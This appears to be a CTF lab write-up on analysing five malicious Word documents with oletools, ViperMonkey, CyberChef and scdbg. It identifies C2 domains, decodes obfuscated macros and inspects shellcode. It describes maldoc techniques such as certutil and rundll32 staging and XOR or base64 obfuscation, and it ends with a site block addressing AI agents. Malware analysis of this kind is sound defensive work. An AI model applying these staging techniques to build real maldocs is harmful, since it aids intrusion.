# Squid Game ## The Room is about Forensic analysis malware documents ## Attacker 1 The toolkit that helps analyze malicious macros or malicious code in .doc documents is called the general ole toolkit First lookup from oledump :

In first question , malicious C2 domain can found in the maldoc where an executable download , finding the C2 is kind find some exucutable strings ,obfuscate code so we will look through stream to see what inside

In stream 4 contained something like a powershell command and it was obfuscated and encoded in base64 so it looks like this command when called it will download something and call to C2 domain Need more infomation to identify

Let try analyze the source code, using olveba : highlight this, it replaces 'A' to '\[' so we can try this on the code we had in the previous section

now we can see the C2 domain and the answer for the ques 2 too, it try get the folder have the file right there.

This will be next answer question let try take a look when use powershell checking that

Follow the hint and some research that telling about clsid so we have the clsis here too :

Let research about this clsid found an aritcle about this : And got the answer we need :

Also we can see the ip and php extentions too :

Next question does not need that anymore , so switch to another tool in ole tool , it is olemeta : This will extract all standard properties

Got the answer about phone number too. Back to olvba so we can get what we need in next question :

So about subject it right on when use olemeta :

Oletimes will help for the next question:

Oledump will provides in last 2 questions:

The M is for Marco and that what we need. ## Attacker 2 So we have familer with ole Tool ,now move on the second maldoc :

It provides more marco in this files also we have the answer for 1st question

Option -i will provides extra infomation :

So 15671 is the total of code not and had compile so 13867 is the code compiled in that stream contain marco and we can see the highest byte for next question. We will finding through hold stream and with option -v in oledumpy will help decompress the VBA script might contain in some stream :

So it might the string we need , reverse that and get the answer :

So next is finding 2 domain , it will start with http and i will do the finding again with that , i prefer option -S to execute the string output

So from number 9 it looks like a suspect domain, and we got the first 2 domains for the answer and taking a closer look we can also get the answer for the next 2 questions, The dll file name and number are right there also the path too.( C:\\) Rundll32.exe will perform to run file dll , we can research to read more about that. Stream 9 contain information we need for next question , so because VBS script contain in here that why contain important information we need to find out and investigate :

Found the times of the maldoc sleep for to fully execute the malicious DLLs (15000 miliseconds) and the stream name again in last question just run the oledump and we can get that . ## Attacker 3 Let take a look at oledump first :

Now is finding executable so we can do like previous step in the Attacker 2 ,change what we want finding and the file doc

Look in this we can see the % represent for variable and that replace

So the answer for next is certutil . So do same method to finding the http or https doesn't give back to us anything good , at here we have another tool for this it is Vipermonkey : ViperMonkey is a VBA Emulation engine written in Python, designed to analyze and deobfuscate malicious VBA Macros contained in Microsoft Office files. Read more about this on this github : Let try use that on this file :

Scroll down and look carefully we can see the suspect http link at here :

Also the folder which it drop in ( ProgramData)

Look again at result from previous by using oledump we can see the stream that execute the binary :

## Attacker 4 Again with oledump first to look the stream :

So stream 7 contain the marco , let take a look deep into it

Scroll down and we can see this

It is the XORI function in vba , first param take the text and the second is the key ,we can read more about this at here : So let decode that string

Look like we got the answer for first question

For next 2 questions , let try decode more string below which in function XORI and this is the what we need :

Same with next the second binary

From here we got the last answer for attacker 4 too

## Attacker 5

So now let finding the caption , with option -e we can extract embedded in the file

Got the answer we need for the first question

Next , try vmonkey on this file we can get de base64 encoded Remove the null byte we got some infomation

We can see the gzip compress in here so luckly cyberchef have the plugin call gunzip can help for decompress the base64 output of that

That code is telling the math xoring the data base64 with 35 too let take another decode on that

Also we can see the ip address right there and the answer for user-agent question

Not readable much but we can see the User-Agent which meanprobably look like here is the shellcode , we have a tool for analyzy this is `scdbg`

Let save the file first then use this tool for analyze shellcode

Let try use basic first :

For the path value we can use /s or up this file to virustotal is another way ( virustotal also provides the port number of the connect server and the IP too)

Also we can see the first 2 API right there ( LoadLibraryA and InternetOpenA)

Note : we can try upload file on virustotal outside of the machine --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kayiyan.gitbook.io/hacking-note/tryhackme-room/squid-game.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.